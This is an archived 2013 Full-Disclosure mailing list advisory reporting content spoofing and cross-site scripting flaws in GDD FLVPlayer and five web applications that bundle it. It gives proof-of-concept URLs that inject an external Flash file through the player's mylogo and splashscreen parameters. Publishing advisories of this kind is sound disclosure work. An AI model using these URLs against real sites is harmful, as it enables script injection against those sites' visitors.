| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 25 Aug 2013 19:01:46 +0300 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>, "1337 Exploit DataBase" <mr.inj3ct0r@...il.com> Subject: Vulnerabilities in multiple web applications with GDD FLVPlayer Hello list! These are Content Spoofing and Cross-Site Scripting vulnerabilities in multiple web applications with GDD FLVPlayer. Earlier I've wrote about vulnerabilities in GDD FLVPlayer (http://seclists.org/fulldisclosure/2013/Aug/247). This is video and audio player, which is used at thousands web sites and in multiple web applications. Among them are Order Master Pro, CMS Pask (Pixelwerk admin), gddflvplayer for MODx, Pixelfind Administrator, WHMCompleteSolution. And other web applications. Also this flash video and audio player is used at many web sites as standalone web application. ------------------------- Affected products: ------------------------- Vulnerable are web applications which are using GDD FLVPlayer v3.635 and previous versions. Vulnerable are the next web applications: Order Master Pro (all versions) CMS Pask 3 (Pixelwerk admin v.3.3) and previous versions. gddflvplayer for MODx (all versions). Pixelfind Administrator (all versions). WHMCompleteSolution (all versions). ------------------------- Affected vendors: ------------------------- GDD FLVPlayer was developed by GeDeDe. GeDeDe http://www.gdd.ro ---------- Details: ---------- XSS (via Flash Injection) (WASC-08): Order Master Pro: http://site/op/video/gddflvplayer.swf?mylogo=xss.swf http://site/op/video/gddflvplayer.swf?splashscreen=xss.swf CMS Pask 3 (Pixelwerk admin): http://site/gddflvplayer.swf?mylogo=xss.swf http://site/gddflvplayer.swf?splashscreen=xss.swf gddflvplayer for MODx: http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?mylogo=xss.swf http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?splashscreen=xss.swf Pixelfind Administrator: http://site/includes/flash/gddflvplayer.swf?mylogo=xss.swf http://site/includes/flash/gddflvplayer.swf?splashscreen=xss.swf WHMCompleteSolution: http://site/player/gddflvplayer.swf?mylogo=xss.swf http://site/player/gddflvplayer.swf?splashscreen=xss.swf These are examples of XSS vulnerabilities, examples of 8 СS vulnerabilities see in above-mentioned advisory. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/6727/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists